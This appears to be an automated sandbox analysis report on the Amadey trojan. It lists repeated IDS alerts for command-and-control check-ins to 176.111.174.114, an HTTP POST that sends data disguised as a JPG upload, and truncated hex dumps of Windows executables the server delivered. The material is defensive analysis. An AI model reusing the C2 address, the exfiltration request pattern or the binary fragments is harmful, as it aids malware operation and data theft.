                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50008 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50031 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50036 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50047 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50053 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50057 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50058 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50059 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50062 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50065 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50067 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50070 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50072 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50075 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50079 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50087 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50090 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50091 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50100 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 176.111.174.114:80
                              Posts data to a JPG file (protocol mismatch)Show sources
                              Source: unknownHTTP traffic detected: POST //Hnq8vS/index.php?scr=up HTTP/1.1Host: 176.111.174.114User-Agent: UploadorContent-Type: multipart/form-data; boundary=152138533219.jpgConnection: Keep-AliveContent-Length: 227184Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:43 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:43 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 